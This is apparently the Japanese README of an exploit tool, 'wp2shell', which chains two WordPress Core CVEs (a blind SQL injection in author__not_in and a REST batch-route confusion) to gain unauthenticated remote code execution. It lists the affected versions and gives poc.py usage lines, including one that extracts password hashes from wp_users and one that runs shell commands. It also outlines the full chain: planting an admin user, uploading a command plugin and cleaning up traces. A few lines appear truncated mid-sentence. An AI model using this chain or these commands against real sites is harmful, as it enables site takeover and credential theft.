
wp2shell — WordPress Core における事前認証 RCE(CVE-2026-60137 + CVE-2026-63030)。author__not_in の SQL インジェクションとバッチルート混同を連鎖させ、WP 6.9.0–6.9.4 / 7.0.0–7.0.1 で認証なしのリモートコード実行を可能にします。
WordPress Core に対する事前認証リモートコード実行。
CVE-2026-60137(WP_Query の author__not_in / author_exclude パラメータにおける SQLi)と CVE-2026-63030(REST API のバッチルート混乱)を連鎖させ、未認証 RCE を実現します。
| Range | Status |
|---|---|
| <= 6.8.5 | 影響なし(バッチルート混乱なし) |
| 6.8.0 - 6.8.5 | SQLi のみ、RCE なし |
| 6.9.0 - 6.9.4 | 脆弱 |
| 7.0.0 - 7.0.1 | 脆弱 |
| 7.0.2+ / 6.9.5+ | 修正済み |
python3 poc.py -u TARGET_URL
python3 poc.py -u TARGET_URL --sql "SELECT user_pass FROM wp_users LIMIT 1"
python3 poc.py -u TARGET_URL -c "id"
| Arguments | Behavior |
|---|---|
-u TARGET_URL | 脆弱性があるか確認(タイミングプローブ) |
-u TARGET_URL --sql "SQL" | ブラインド SQLi でスカラ値を抽出 |
-u TARGET_URL -c "CMD" | 完全な RCE チェーン |
/batch/v1)を悪用してリクエスト処理の同期を崩し、認証をバイパスするSLEEP() タイミングオラクルを介して author_exclude パラメータに注入するVulnerability check → Seed oEmbed posts → Extract table name (blind SQLi)
→ Extract admin ID (blind SQLi) → Extract cache post IDs (blind SQLi)
→ Inject poisoned changeset via batch → Create admin user
→ Login → Upload command plugin → Execute command → Cleanup
author__not_in における SQLi:TF1T、dtro、haongo によって発見